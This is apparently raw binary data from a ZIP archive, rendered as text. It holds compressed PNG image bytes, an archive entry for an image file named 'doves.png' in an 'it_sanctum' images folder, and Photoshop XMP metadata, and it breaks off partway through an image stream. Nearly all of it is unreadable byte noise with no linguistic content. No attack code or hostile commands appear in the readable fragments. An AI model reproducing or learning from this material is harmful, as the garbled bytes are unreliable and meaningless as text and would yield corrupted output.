��t�X�w�Nɪ�W6�[�0�aiW+��
�r;u��;w��W}���'j"��2�������k�� ��][v[D�cm�E��mU�����C@���E)�.s��
:M���R>^���݅V8�(۶�x-ck�]�l�
��	a��A/ދ���s'w�a�Eic:��U�H��pw�Cq?+�ȑ����J�b���uԦ�
���e�8�{��}��"�'�ٕ.�=�Xި_U��Rى����h���R?���ڶ��$poeoi���g�
x����?�s��}�O�ܳg�[Wׂ�T�m������g�Ikm����s�~/�$�%ZM"��A%��6�ak�?h�F@��B��zW�+�6�]Z�gW��I��./5C���H����h0�괂���`��9��v�<_���-����;k�&Y[��~���5�C���sc���'/�MVi^0=JKI4��j�
��00��i�W���h	?�a��r[/��%�
�b����~.�Q�҄c�Z7��Rɂ8�2؞+Q��U���6bi
�	�&o�
���PR&3�����h�,w�5@}n�"�z?�t���&?��z�Y]��Z�,`;Qp���~��0��٘�,����"^>y�ި�=�ܶl��np,�y�����I��d�H���!Y�n�i���z�b��V�xG�|Ǿ[�0�M�Z
8 x�9�M�8�Ot�����p��;��W?�TǺ���z�k��n|�;��t�v+`�������'�@�`|����Z7�a�6N-
t�%�pl�j�'.���U���免K���s
����{u�jV�&Aڍ (�_X�?�sl�Y��h�3��;�T�D�����K�?���rl�ı0H���4L,Odk�R�nŘS/��%�i�f_��yy��pl�#;�����f�V}��~����,�w"I�%,Jq��Sc^���>@�n5
�L�2,`�F+hp�J�>�A®݆G3{A�ÌS��Q�S#N�Y�S��0��~�Q�;�´�0� �UŘ�4a~o{;�;&d� �ԑؕ3ձHs���6ʠ�A'\��J�8H³���Ҿ��LvJbrK�_�l	��j�x��L��T�g�	�KYi%���U�5���Z���&��Lm
a�&E�ބ{�e�dSoܽ M�O��^�v�t��L�̐I��5�`Q��;�	�=�����r_�wa0�;�\��Oa-u������ť$׸��3?��-�{:��x�P ^}�Vbc�t�ɺ3Vq6;����$��0˯|��sO_h��6����L+��W���H�T*��x��c-�ǘ&j��b@�@�MVA��i�D�,�Nz`�5n�b��S
w�YYq�fݵ+��V�D�3�VZ�ڃ8��]?
A�cs���~��
xf��Hh�JCc(NL��`��X6�����tc[#�Ӂ�qhŽ~v��h�J���c�sx��ԧ�j~,w(v�maz�아�R�N�T*�|ĽTr�rT��t
��]��x��܌Y��6�����nU;�4]U!u��`� bw��ى ���$X��y�0�ɬr�����+�+5�lH^�u
q��(�0�ƫdu=.9�$�_
<���=`O�LW�Q��{�1i�%�L���^?�;�2�=�y��"
��ڍ`��8��;]B`�<6���L7K�&!�b �Lͅ^[bIԍ�|�<��S�Z;f���5�N/F�	m�1���Z��\�ܨ���o�6�5]q-�����	��+������d����[&� 
��$�����>���i���\�g�$
c��q�(��=��q$�E ��l-��Ib�
J��%��`{�Ԑ���@�Z&w1	$��(a�T*��X�TR>937��bҵ8<�Ym��f,G�E%λ��lְ(;&D��!rK���������M��I�3�	��gBm(�T�
�3�;�b0�:�;\�Xև[�Jߦ��TT�ާy��髶[]^�K,,�$�"`X�+;�g���r'��;�=1�0b @H�yf�}��l����.Io;X������T�L��Iq[@�qw�a�}��:8W;�ʦ\�^W��5�V�J=����A���R�*�n|��)ژ�ۿ��~�m�K!I�Jj�j?�a�*c�1t+��Z��f�w�x�j�0t}���j+�z�N����c�Ծ�s�0��؃.�ÈY>,j&�l*oy���������C%�B/`�TNr�t��D؛O&Ф�˳~����ٞ���3�R.�JN���1e�1F�juxz��,m%�^R>&�7����d���j�w�
�,�a6����xQ�#3�ߖ��S�@"�N���Z�7W�ߨ@'ծM�v�S��Ȟ�B��e?���jt\{���S�h��V��K��ik�n�r)�<Z���ֻ篴A_�RJ�d�(Qv�p�[���AwD�ŲM��9@�%0�.5,p�V
��,˨������ph��'�a�vW�^�	�L2;^�ƽ�U���0�O��m,(`<��kAj��.\��96�]*ի^��z��!ت4ib1mrec��N�Zm�yx��ޙ�Xv]e��}�;��Un�c�`� �D����U��/E�"�D��$`��vWw��9{`}���k�#<�U��N���g��5�t�!�(͉�_�;4������a��^��%!��W��XGY�
]�.�+Pv���lV�A�d7�w��R�YD�}�Pe �mYJD�^�_�T�,�B����#��FK�gyP%3%���R��\�"�H�F=ԸS&7��=�	eM2'h��`����$�M*��R�-Ҕ���M��K`Q�P됓����#��{I��/���w��az�_�Z,��X�'��/���~�_���K��1k
gNU/���o��7���G?�A����
�=}BI%���uUYqt5�
jT��~�m������򺛋+�G���nx�r��;�ϟ]�כ��<����״�\�껫���/nwo ��3WU�P��R2I�%.NW5rP�8��rU�ܤ��e�Ш�Bx|�v+_��ݵ�(rJ����C+�wgڢ8J��[�!�4kh�3�CZ��Ч��m��k[��#���4��#�v����a��8b��,^����SK�f���1�� pJ��
uO��Q�D�>|ږ!̐Mb�T�#�G�G��,/�Z>��*9G����_��H�,O5��ٿ��_��\����z�Ebh���bY��/~�Ӈ��[��7��o����b6|�߽ٛ܊��h0x�EAV�ͪ�v��%9G�eV17�a�����Œ+ԵxR��(���#~TR
��@�5��/7�yu���^��\��^o����K�?����n�;�].�x���\��>��x��]u7�������%�lGh��`&\b#����)����T���4���w3yor��.�Uc\�Y	�h|D�l� G5v�m� �s�b1��h��j�G�$G��	J��(ʼn�>�3���FU�d�d�z��!�)H,�ۼ�lu�
��Ӟ:bn	�����c��@I��$*)S�S��d�ܢ�'�{����D,`�-7��{���~�����~���q8���J�%�C�潋Em������G�v���������~5��r��R�.�g(D�G��f�{xts���~�l��z_6g����YR���γ�	���Jn}#�9����?^?lF��˘C=o���
C�^���]�IU��D���Q|����h����kq��b
x�Z��Ib�PՋ�H$ db`�"�Vp�H�x���rk�6&f�6m5w��y�O_%�D�gǧ�j�R��(�c�֖PBl7�59�����+���=	xB
�^�
X��$X���.�3!�tI8�Dkh_<c�Tv��lpP����0D��X]�����^�
	TͫL�@��nr�kEUC=.���G?
d|���Oh���X������ǟ��>�Ͳ�IZ���u�"F��?��|���K+�Σ��N!�\7}��Ny�G�W�՛R.(�ԫ�#d�$ΰ�Ϻ�F~�.��ـmź���>����������X~�o���8�.����Fw<��}���MW�����7��ؽx�4r*,��q��l�ƞ%q`�����_!D�ZՋ�
��E$�	U?(���`N���h�B�F�4
D׾�M�&�%F��r�
�.Z�F�mڏ�|!^§i�яu��<����'��J~z���c1�����3U�6��yry
ս2Yi
!�N��vb�d�N�RY*����Q��P�,��.�����x㜢���b.Bi�v/W�ݦ�S�.���Q�@%Bo�fQl !�����v�g�~v
i��۸��K�,�o��N�@2��1BP6s�\\T�MZI���=0Z�w�o�>���gf��ˈx�4ͳ��j1���7���mS-��o%Hz��K&rS�N>g�-��VraL.��wD��	E^�u��,�x�HC��c;�����o�[��嫥���QwHp2-#*��L�|R�۷h�P�"�$�I��D���OkD�/�6SA��I�ʦ��F���b�?q��Y]��b%Ы!�{���|�<!-�&��ur����I�T�M��MIFШ���Ħ- �cQI�b8Va�z(#�A��]D]��]����?�����^�o����Z�n�ES���W��>ڙ��'c\ȝ#��q��K9j���.���0
qv�v��?��z,��4��a�w����7�V��Ջ��ImU_�-�.�j�8����W��F��A��LL.�Y�8"�*�O9F�P�����R#8~
�{�[��#�T��(��Ǣm\u��L)S~2ڃ.��/V*�o�"Z�Ru���ghw���<a�Y�g=�ē���DN��'ш~�'NK�������	&���$xu"~f3��]eb/��K��&'E�4oc2�K�!�-������BO��a���!u<nwۇ��ݽ�������f���}x���)f��V�Wk16�7��F>���P�"�Q���Z]J`�X����أ���ٮ,y�&_�;��ykz��r)ַ�_!{�X��j6�����%x���9��*��T݂H��~�8A�d4��7�Mq�"��N��0�ģ{�kEj�
�l
i�^�\���!�@KH$�+h�BJ��sBw�(U&(a`���'�H�΄+fdƎ*�K-��>Ӫe�/���CO��]�-��MUL02�%O<n�!
�y'>�5电L,0�7c�iL�
�%��g��QU��ɠmS�&m��O��Z�/\�o�n���}���z�Q)!�%1�xu��^����°G]tee��	��㡿����u�bi�þ��pp�.��>���L[ʩ���{ձ��w���/��ż,\��31�\�B�9��P��e�$mgB�¨�Nq����UM�BJ`X��p#K�m!oA�R��)�=c�̩ZNB��܍B��N#O�t	�	��J���ME�LWCmF:(�	kI���>	�d��Ă/2J]��A�3p�U۶1&�"eV��T��eI�<�lN����}��6��t�8�I��$q���-����n�I�](��cz��բNy;��]Ң1�u�N�#Kd���A��J�J��Vv��ݿ���\J�_�j��{�n�Ƭ..��HB!.���χ��P��0ȿ��U�ͪ^�t���e�&"�ܡ�`5�v�(��i��]R���(�'���Aɒ�����٤����dU�瓞0��>-$���!�N[%r���!���[�J[�ܨ����o�$jL$:��0�f[N:��*ڝ|�8�u�$S�f���(�
��0U�ӄ��xes:���j���L2ʥ��1�n�U��I#r�7%�ix�&����R��	%���8��1��)��AT��� �aG
d
�Y}fE�L
��W����P��k�7�۫��~v�Ќv]�$�k�pu�0ӌi���P�u���6u�5���-߄n�b�`^~�:&�<S�5ʂ۷�ZaՉQ�n�$�0B�,9�Y8M����I�J>II&���\�q�-u�c��c2�K�B0����Ru��󝤻C�A[�R��d�>V��'��3\x2oL&��@5An�V�S�im��4�����Ν)�œ~��)d2��
���B=�jY�&+�'�C!=�.DU���ar�^���`[��@6�gYqrP܌c��S����;�2�~P}���x�G�^̋r~Sa~�P��G�k�B%I8[���f�ȯڶ�u�^ճ��呻"�򵤥��`�B	����`���Fw�r��RA:X&	0+�^�z�J��������ʈҮ�b��?pZ�p�����M�W݋�|�\�B_��qY�*��dКDg�ɘ�_��w����&�K�9Y����0�i	F�s±���CF���'�U%.�:��L8J
������	�o�w�v�8��C�
rxN��>R�i�`�Cof��Ha�O�����[�;���<��:o�욺m���ĦĒlAP\�ݷ߾��\��ۛ�b�����G�&g]'��š���=H��^-�I�b|��ְV��b���U�H6U�2�7qC�.`�F�X��t�yV�{��	��ö��s�V̧����T������ ?IS��0iH�[�g�٘�Ny/�4�݂HZ�%�d�1k9����wK�Χg�5��F+�a3%j�"~�
�#(��G_�^YQ��JUɵ9�M�]V�
)Y+��d`-��L^�#�L�|��X�>�D��?ڼq��Ab�DM,��!I��rlKLv��s;IY}����c=��1#���|����l�Ǣ���v��n+�W3k#,`�%/9jyTew�ʻ��ThYꭌ�bȒ���*�����/"/����bi��EOǂi����t>�Ȩi�&���?wg:��?@V_��;�<�D� ڒ�Xgp�h'}�,i*���I��Y�"e�D�"��!�) �[Z+�	���P���Y�8�?�2iЪ�ji�I�R�w�����F1�iE&Vx��-�KG��"�
��%j�<Z�� ^r8��A���E󝜈C����"��5y����`�߃i	�1w
)`�$�}��V,�W��J>��H9Jrh��Z+�����'��
d�+�N%ujj궢��@}�*�iN؆\�Ng��d۽�Z�ꇼ�K}Hh���F�Gۘ�֔���'��l�^p�h�C�;�|K�!(�oD���WL�U�C٪�c��*�(��Oɛ����b��w�-Ӏ2���B�9U$q�}[��K�*�r����$$�ajtj�Լ�jP�������¬�}z�2�?C��=�ð;��ZJ�]D)!j$��h�|���LC��p݋g���[�=�=��<��)c�������,p�U���b^�f����Ji�aFu�T��TY3�$?�pw,�|�@Y�8+~E-�ʙ�F��thB�����)�j�IjvE��_�+,|�䋉B�m��qQ{tX�C�M���YSæ�S{�v"���R�s�$���ʁ^�=��<1e�Oԁ�T03� �QG�Ę�S1�(2Y͘��	��{<�:�i��d�"�����_􇵸�Ў"��2a���
I܉�lL�j��񫘂�`�٠��|���wu��mL��mH�֦lm����B`���-�+`ݱ������{C;���gvm�ޤ�)8�Ra���$Ѯp.N�zS"�@NL&roL��4d��O����Y(.(e�]#%�u�H�&���H�����[���2�djsGV3��O�S+z���΍��&)	Ү���|!s&�Zctt�Ֆ��iXɤV�I�d3E�&{kS��S�
*?RN��8�yb���6�~8�_+����M̶D7s��i#jmX�Gz�#9��K��P?oj�J1]����o�Ր�o���dÌ5�H�-Z�ѓˊM��-�Rl�n���8v�a�!*�r�M�ݥ��n*�$r�%��i��.`h&��|�2��&�UZ�gi���+r f�=H��)q�!LyK'�/^&�D��)&n�����]�֩�cW5�^?+n�����@S�9��9wJ�TO$ې�ŋ3-�T�͗vMO����9�b���^�ə�UL�H�����&<v�]O!�(Cc	3ftb�@��D���y]j����,�ʻ�n:�Θ�,.��C��L���?u���8r��A�c��Y�7�
�̧&�e���� 6)�g�d��BH�`�7q�7�Dp(�M H�NYj�d`9#�n�r8���̳�)�`�&�+����Ӏ��QmL�W��y�#����a">�l ��O��4�C�.!S�X?�ia,�"p�KV'?Q-�u�I�$��bNb���qWZ��H!��E�R�y�4y8��l�2�€	L<1��b�F����0�!��h�x�uf�]`�
�љ�).g�0[+	РG�J�PG�2:�QB���9�Nd2� �P�\���oYVܱ�Q���)$�S҈������ϒ<)G���}�f%�3
T�T��3�����_�rCa'hk��;@X]��J��460��&_H:���`�L��]��cl/�+�`1�a7o���LK��#��)�:Ñ&��*�8�x��N�-s��~� 8ٰ�sjnL=�s�`L�!=�NA�Ao�ғ~���ԈŹ!��&!oy�Ig�N�<X��l0�(�I�R/�I�Mn"����.\L��T=��O��I�	��9�3N��9Б���ř��(:�G&�e.���2��?�P��c{�&� �bb����6������==����t	�OG���tԞO�����x:jO�����xz<����Q{z<=�������4�Ս�4<kIEND�B`�PK!/}�K�Kit_sanctum/images/doves.pngnu&1i��PNG


IHDR��g1,tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2D3A1014800E11E69C42D17F5B10A8E4" xmpMM:DocumentID="xmp.did:2D3A1015800E11E69C42D17F5B10A8E4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2D3A1012800E11E69C42D17F5B10A8E4" stRef:documentID="xmp.did:2D3A1013800E11E69C42D17F5B10A8E4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��H
IDATx��i�$�ux��Z^�}�}C� 6B\A�IQ��Pؔ[�F�)kf������ѯ!�&bdK�š��Њ�(�HK�L�!�
��&��zA�����3����[/��{ݯ����Ȯz�d�̼y�w��i�^�x��ŋ/YQ�x��ŋ/^<@��ŋ/^�x��ŋ/^�x���/^�x���/^�x���/^�x��ŋ^�x��ŋ�{#�?^�x�r�DJy_
��oO��˭x�<@��ŋ���(����_l{�_��LA�
D���x���*�{�A �/
>,�9"�;&N�>-���φarr�_ό����/^�x�������rbbB�E�k�.Q�V��Ғ1
'O��G�fGB���^�x����c0::*���e�T������C�y�BQ��y377g�3�駟6G���;���~��Iz�U�i���/^�<`�M�;pP�VeE2IY(DJW�����ׂ$����ϋ�\.H8q�x��G�ŋž}�x?�F��
�����g���7.8@�e�^�x���x������~1�� P�B��D��(���$z���I.'G�V೟��'�;�bQ���+���u�w=��˃!����/^���ru�3����ٳG�ML�Bo��U��x$H��?a	��ȼHL'Kq�tO����
D.W]]]Rk-�R\�Gx��@ ����KN���A��ŋ��������<yRn۶Mb��]ٺUծ^�}}}*mL���R*ݔ������Dwkz�*H���(�1*O�5���*<	�����#Q� x��ŋ��"p��={�ٳg��p�Ȉ�BѪ_&A���R�P%IH���e���$h����]"E/�8�{B7�ͺ���I�y�j���Id�^G�����D|��/^��K%��I���E���JE���b���B�ɐ7È>QTq\%���QT�9Ex���iH�Lho1
[��%5cc
��`Ht����c��q��i�Ⳝ��	��s��x���'+TT{i�"����r9z��JE:I��M��^S:Qxɴ6�9�E!C��P�2�8	��	$x�<��x����YJ� �066�9qlT=�+7T��O�?��%�����DBIad�`�/��tC�3�l)�R�*�HOď5M��A�C��bQ���'�#�s��� x����C����!Q.�	̫z���������f@/�E�4�D�*�JJ��[�4J��ZBGB`OB*��J�G�@�cs݃�A��ŋ/�8� �	��BR��J�ɒ��e`U?u�M}���0�����v"$����(F�D�96!y
���Z�����s�#L��=^�x�����qRbOEuww#�Pխ���=F�c,cxq��k����pa	v�`m��
��~"��F�sh��nKI ����ҋ� x��ŋ�{,`FDRb.��2���E��Y� �<�x|^J�*P#��)����B͂T�^b��$����)�0#їb��=�B�\�iD�h�l��%���K��x���{���?44$i!�bE�u�ʃ��H �	���n����Ę�06�JK�$J$���о
|�������]$�vH�P�a�����dZHϢ����A��ŋ�{���b���/HP(�ڵ�钵�i�z��3�b�	� <)~���D�@��a�b����7�I�i':�2nJ��j4�(D�P���b�9�y�}�/^�<����]h�]����B�"B�I#C����!���&h�@��8��O�3�E��ʅN�"���E,0����AgG/���/^�<�������^9;;K����HGQ�e��d����@$n�D&_�A��y��`PE�)��;��
2�%�����dLB{����u399鯎^�x���y����O�e��ݭD=ъy�2�9ŠP8M !+.�?���(���I0R��8b�Ar��	�8(�B$0Z�M�\�f�~�'(>�C^�x��z��X*�d�6Q��&-�ɒ�@80&'���:?G&>G6;�/�d�a�i>z��� P$p�]"� ��Q)�0�Dh�`��$����q���x��ŋ/^���Q��-ɉ�BA�� 1��$�Z����&$�@@��,(�q���d�4�f=��@�Tʰh{7��Z�c۹s��@���/^�<hB��•+d�d�����V�*a�N ^E�"42�l�
�2�X�4\�
\���=0���1��b��/0<�/	!�R��D�A��ŋ/�T�r�S��‚ü�\!�	�P�=�Hx���GpH�CB搳�P��8�`�l�Hp�J�Jɡ�t0�!$��l�޻�xp/^�W�{�x����-.91�Cz�����,(�fK��w�& #�
@�F�>���!�t��5�(�5Q29��25&arE���(>�WA�j"(�}f�ɍf�6~lm��� {gF�%��!�8	j��M����	6�;��`{'b?`9�1#���A�����7??ϯ���[�R�����w�n�B��6�ɉ	���w��5�ϋF��A��N��=��Ð�K��]~�k_��C�q$�}�C��-/-�nz
��o}K|�_�P�Ĥղ��:�Gcsss��GSSS+�G�Y<w��|�zjh�{���...���9R�q��:��9�Ͻ���9^�q|�{�(M{���o9.�!��q��~��׿�u�T��.;wLz/��4?�{������8}�u�������$��?�e��b�֭�T*�\����_�2�cvv��Q,y�Ȯ�s�{33�4_���-��%������O�:�s�];�[����8p��{������+��ӷ}�hl��,�T#����J�|��9��"�0\�`��1Uu|�1^VQ¸Ѓ�Z�
�����e����2���wR00 �"ׇ�N��v]+�x����M�� � ���:|mZ�FS�U�q"":6C��m�>H;����}@�8@�z�"`0G��̹s�Ё<�}/�zM��ː�xy�4ʩ>���f>�� ��\m@Z A����4w`t��-���V��6��"�7rW���`�4�`4�����`O2A 5�}��1����D��U�Z^�8j���*k-/@D�Ra�~ddԭ���̵Ǵ"1�6mʬ��JY/��#�o�u��]�.����/.�saؠߏ��-]	I<��q+���ҋ/���3�GϞ=��0DjAC5�R�D+B���Xk�?�tޓ���-����]R�Ai9�16�Q��Ha�m'iT,㦑a��r�Jk�333��y��w����zυ�����O?�D�V�W&oL,<������FK��(z{z��j,���h<����o��K<�=��
.tu�L*���o�J%*�_l߾C\�vUtww3؀[�f`ȋ/��;&
{���;'&'(&J��@r߅�-�U<�i$�"�.6DbcƆA�l�+��`c�L���@�^#Q1�3��h��^J�����{!}]]�?��g?���G�����ܾi��)u���~&)�
;������\�X� Fн
l@wo|eJ���w��|�ħ?��;vl��~8�g��ws]�b���Ȏ����?�L�С��R�4����g?[;���ܳg�a��0VZcF��!��YOx���v�^�x�{A���^n��l)�Q}E0ڒ=ܱ�0���Jia"�|x�iy"[���"�)HN`(�s&ro�m�˸(el�TA"��䵖G���H�l�]�����}�3׶l��w_:��͔gAN��;�ݷ��}[����Mcc���k�ޑ�����H��\_oq�}hj�#{7�����w�9s6w�ܹ�7��۳kO�ڴg׮Zo��O}䣓�._�ܳgo}ǎ�O�]����e��t&��v�'�rx�����_�*�9�&�F*���
E3��%3��
к1Q�`��Y�Z�l�pX4�M���;��w��H�XAAbQp��1�n�^<@���Da�o۲u�������y����G���K���7^?�k&�ؾuK��?=�����Z��0�1I�X #�P,;|��J���}���[z��r|z��ݗ�[��680�߮�0���GаL��L�i`\H�D3ъ��5���˗/s’/^�^%��z�).o�@6�F"�9Ib����Z�+�4����ʖ+W�`���\~����h��(AڪA"IZ!�?b��|�"&P������S27��t����ӛ�F��z{���MNM�<�����g�='�^�*.^�$�z��5?80�-N�Q2�U��<)��@��3jc��g������y)�ˍ��<:r�������"q��
��o���o��٤����"m�������2)��+�Yx!
QpN���e�7�4��R�9/^>��.\ ��(Pi�h�(�xu��\�h��@����-Q�#1y9���L���G.������H���"���	����7�^�#O����O>�7vEIoo�ڦfg�{��?��C.^y�7��oܐs������/��_�}==E�|��hҝ�[K]�[{Z*y���>�����/�گ]�z�������ɓ�z�ЅjyI}�7�U,��,O �WI�U�h��|>7N�`VA3	��U,YaG��G?��5�ĭ�z>���Na�=
An(�N�P����b���)ZdF������c'@0�_�Ȕg'	*�&m�ȄK$1�X	�	��MzfF���#_|�E����y��e#<)@h{����_��r��RW׍����{lۛ'�$�p�x����_� ��x*�Ji�.�i��RA�y��k;wn���]��݃���_��w�z��3��#��h��SO}�
y�O��E�=�B!���P�MC[�����k`\���c�<v<����u{�/�)@X�'‹��Aнq۶mt_��f%˒s������*�սLS�\ʝh����KD̼�n
����t���4�Q�T�6
1�*�ŏ:bd�_(���W�R�uN2S,f�#��K}_����}��mo�>-G���-�E>��$&6�ƨf����xTi��l���8���߷o��޽���g�����޶���r������~��b��݂�7���HG�F�T�[)��TRD��%�1E�h��S!�R����_~Y�ؾ}U�����9� �N���	^A���E�86
+h��Qio�X�V��m²W@�6��UA�' $�;n��Z�*($�����	8�H}#�W��d�_4�l���Q�°�BXY|����94��������K݇���"0Q*�~��������ȓ���HZ�X��h���G>2�o��O���+Wff�7�����c�?>�я~,�g�.x3�R�a�f���/#�Hx_�\�B���1�g�g�CC͌�@f�SG�ӈl�6y���V��4A��:0K
��$:"�N�h��kh��Bg>B pId��7$��4O!�n
	�+4��0"��$�>�̏��Ӿ��/!()�Z���)ܓt%�X��3�Z��t��50�0?V���{{
IӠ4���B�4-9�Ё��A�^/]�t���o�>|��k����s�&�x��N�>q���?>����Q�~T�����B� \	�F��r�	�����K_b�B�V�q��{��@�5mn�nle��xyh��p����PM
���J%&V�Ѩ��z:A��a�	)(0�s`s�5����}��"�A���B3'��0ϛ@��]q�T���M�/$0hHPt�enW,�l�1���s㓓P��\n�a��Q�Ɏ�'�Dw�$:��$�o�Ϳ�����=;z��Gw?z��ġÇ��>O��͏�����7�<���>*���.F��-Ѐb�A�"e܌D,#p@�J�n��v�U��97�)��%zl:ֶ�����h|x��C)ǎ�`�^�������e�����rDKlp@�jHZ !q�6��y�������S�H�Ln"522�= x�[ɺӫժ�
�n@�`v5%F���R��@+�Sd8s*�s��@�^�j��(���@�}�6�/��.^��k��}�k�k�r���v�Ƕ=z��x��G�x��+W���W�4;yD�ڹC�޵C���B����0�ڷac�����zԯ��B>ߠ��r�~�*����Cp�N�u��y���8�v�=��r���B_���%����&(�k��&(���"e=�r�97[ɉY@��G�'!ܜ)A�@	#	l�QI!�4���u�y�f_������J�nm���sa(�(2Q�Y'�\'#>[\�Z�.T*���z��B+ۏ}�cb�]�/���ԩ��ko�)���زikO_� �*-9~cJ�L͈�g΋��!�i˨زe���@��6Ф����}
u���J��X����IRMכ��"�7�q��s"��b�PD���o�Պ�/���ei����
d~�Ȕ�H��ʭ#Ŋ������/X�@!mSn�P�`��؄����@�8	k�:{/&&&|�^6�p�!$�m�~�ۿF"��A@d���gZ������o4�ƐR��}��H�G?�I|���ܥ�W�r�I�i��Cl
�.�u(
�P,Ukb��5q}�8s�����	,������QD�H�I�Z��>��[e���wz!Q���$J1�54������u��5���ܩ��� ��9����B��\NL��e׼kV	b�7C$ĭǘޏ�g�!
�
��#0ƣw��{:va�����
m��J:8�TP��	�X	��
��h�Rw�<���r���8��v�ݽ�1:8��O~l�􍩾K�������T+UC�J���b�J��rU���i�˝��e�&h<��U�cS"渖NJPDľI�L)dd���� ���C�4�mK43`![�`��ޯ���`5=/�����q��P
�}�%�E�	B���j��4�C$dsR�$p@�>�q��[8�|�j�(
�����&7�UhW����a�^x�{<@�r7�
�6ʀt2b�Q.���
J� �,.%Q��Ϝnlںmqn|BT�KO<~�'��*.u?���k�m�H.��fn�)�\(&&�Dw�K�
�Vk���9q��3"B1<< v��)6mc��U,������R��6�i@�æ���ނ0�u���4}Aغ;�̩B���=��ز|�JEX���n��BF����<bP,S0в�iKy��� tXc.:��)u\NX��|�rJ$(����Hj�h�ШHZ%�7�|�5׼�/wh��k���+D�2�f�0����f��J#�bq��i"�����a������ܵׯLӊ����}3ssË�աj�,"�Gu�,�����iy�Z�%���/
�9{��CQ�ٵ�JQ��e�N��g���8bCM)	$�,�R�p��.�Z�A���w��R��ZރpK��#9������X�~�i199�]R1�m�R팷�ʶ��+ql�wQg7�\�v�z�E��CH�6YQ��4�c���/:�Q31Z5f���J���G��#G��/P��ܮ4��i��j)K�����
1���g�P9�(iL��P���rIf&��O~��ձ���@&�fgfz�<��\?�#�!���
&YHh����
C�4#1;;G a�%�8b2�C���<�A(`��3�J��4�/a�	t�ۛI���q4K��'pU�-BEt����5v�.8_[�l�-��;���c��-/w/��3�o�Pp���@�RF�v�U,,',�,8��M�Z�O�	�r�+!�^HR��I��	�FjzU���FFh?Q��^Y��r۶������ �/�!�Q�I�t�+V��k�z�<dsb2(mB�8�G�m�R!�]O��m�Lƿ,{zz?�3?�ΩwN��j݋��…+�\+���A���K�E�+�	04����ܴx�[g�8?����)�S�C��[��h��m��T�"e�N�T�O�F/�T�4�n��h�h(ݯ�����y�Lq^{zz�
t:���*/�1�O��vϒ'�l���c��E���\	�k�8r#[a
�zpX
WgÕ֣`[@n�L@!6t?&i0����H���򆰼�۳g�Q$\z���-���v����ۻ��m)��_�  Ȭ��Q��"���00����J���2C��_}���sg�������v��qcB�UQ��X�耔ZX�hj62�H��߉�������|Rl۶�ɛ�0`*X�H]-v'�݈��"�r0��P����x�{����8����\�{�I�^��A��,\W��ӵ�ᩩ)�=�q'��ۯ
}�t?6Ԅ9�2=~A� �,�.�A�OT$���0�3�ɂ��T��Z�ߞ[ik�S�u��b�߰�Z�V�mI��ye�R��!�
84U�3?_#�b���Ǐ���<@�]��wd�:�u$��R@h���.&7�����A�G�*#�
!��M���	9==I�/m�4v������X�t��ձ3��s��U���BƁٶu�(�d�S��(��Ǐ_]|����|�i����bp�_�
PBw A�#� �ܮ\/�PH"cG�B��>�_��ܜ�冔�Ч��a����������{)�Bq�����V6T����]��+�z��?�Z�,Z(۾����@@3�[��÷�@��⩧�B��
�A�=~Z���I�)"h?�6A�+����;��0�\$�������ɠ�C�PC@x=���eЏ���	=&��V�v����Ѐ�{<@����A����� {����
_�&���(��fs�{1����	J"aH`T\NiU`&gf��}�g��Gv��B���w�T*��ܱ}djjz�Z��Ν�P<q򔜞��F��ts��]��E�+�e�?��k�oE�u��(䋴�Do_�����
�J�.[A`��i�4]]ri���jE�u1�z�w�1m�{O��
�~���}��B$��z�g�b�x�رc�]��q���5.��� �6x�\���s���qs�d�q�/�|#��8r䨸p!�w��MC�4o�2��Lɣt��z��b\Yρ�xZ�
�s֤��I�C0�W*6J�\dP�� HB�B
�(P'O���Gi'G��A��ZM3q7,�0���z�[Bg,Ki�YT౵*@��ܜ@�5<��ƽ�ܠ�+t-���,��UH1�7n�޿��b~a������l�?��x��Ԥ�~cB�� �r"j4ō�	R�9�^J�-̋z��B�r��0�BWOQ�JB��y�&12<Ji6v0p�88�#j��͈���S�ΑQ ��
^��Գ�0D�~��$#��rO@XA��뼟ϝ;'>�����
>{n8'F-�j��(���nׯ_���(��9�5™3g�޽{����aa�q�M�H6yw=���]�#4���%�'↖:��p
F�U�4)C��M�m=���hy�\�VK]̆-�&�@�C��ڄ#�(�:&��NK�ir�j�.Zd��ǎ��9ڋ�\�?�����a��ك�J�6*��y��@B`���9 ��f���mP��y(a�����kM��}+t�o��o�?��?��k��.�o
�����R�0�c��������S'K��Cͣl��Z��%&�����d���^�>M�ŵ�7���yCC�b׮�����A�F&�e��qת5�Q�\�E��fa�P2	b�z,����@H{]��sٯ׃��;��W�2H��w=���<��W�B�m�Mr��E���!w5L��<L�N����_���c켷�7@X	;�G�\�c�&�ޣ
�cǎqXoӦ>�&M4�e���=KN?�&U���Np`L��/֝�>�
�瑋*�����j���LL�&`A�ű6E
a\BQd�('''׍�{��|��׹��g��@�ǁ�Q���qc(A\�Tѻ�E��#ƃ�"�$�4	Cb߲��*���z�P�����d�����I2�Qs����w�յ���ť��F#6ss�C�S���&��!��h2�\��"�Z�W!6X6E�Vӳs|/]�J��=�=b��<�\�B��LI_d���Q�}!�q��>B czOB�@��<�ܒ��ӵ�-�_e���P/�j��0�{.\�j#@�et�=�\����s^GR����߇���
�<T�<K���ׯDɌ)и�zӪi�[�àa]��[9�Y,���pޮK,z��q��h� ��4I�T��8I�&�a���q���	�z��FN��o5WY�1;;ˈ�ƍ����){�PH�n�Ȯ|���J�sR��V�M����#�׌�k�����ƅV�z�������>��2a&o��F���X �q��o����������?6�ʦ����{��������������B��?��勢FFd�T��DGb��µ�Iq�Eq��/�˗��}��
��HD�AND�V�Q��3�9@�m��
�����&t2Z��g,q�a\a���~v�z(��=>{�Tf���$U���̍6Đm����ϟ�#í�����$���
��m��'99����s��L�}W��e�ǏG�Y.3xA�&�"�e@Ύu�����,��*@8a��0d����U�=䨗9QEK�	�A�q��
